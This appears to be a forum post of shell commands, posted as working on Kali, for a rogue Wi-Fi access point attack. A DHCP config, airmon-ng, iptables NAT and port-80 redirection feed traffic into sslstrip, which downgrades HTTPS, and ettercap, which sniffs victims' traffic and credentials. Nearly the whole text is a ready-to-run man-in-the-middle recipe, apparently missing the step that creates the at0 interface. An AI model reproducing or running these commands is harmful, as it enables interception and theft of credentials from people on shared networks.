gedit /etc/dhcpd.conf
######################################
authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "HOME";
option domain-name-servers 10.0.0.1;
range 10.0.0.30 10.0.0.60;
}
##############################################
root@hk3r:~# airmon-ng start wlan1 11
root@hk3r:~# ifconfig at0 10.0.0.1 netmask 255.255.255.0
root@hk3r:~# ifconfig at0 mtu 1400
root@hk3r:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
root@hk3r:~# iptables --flush
root@hk3r:~# iptables --table nat --flush
root@hk3r:~# iptables --delete-chain
root@hk3r:~# iptables --table nat --delete-chain
root@hk3r:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@hk3r:~# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
root@hk3r:~# iptables -P FORWARD ACCEPT
root@hk3r:~# iptables --append FORWARD --in-interface at0 -j ACCEPT
root@hk3r:~# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
root@hk3r:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
root@hk3r:~# dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
root@hk3r:~# /etc/init.d/isc-dhcp-server start
################################################## ####
root@hk3r:~# sslstrip -f -p -k 10000
##########################################
root@hk3r:~# ettercap -p -u -T -q -i at0
############################################
in MY-kali worked-fine:
http://imageshack.us/f/89/1ld1.png/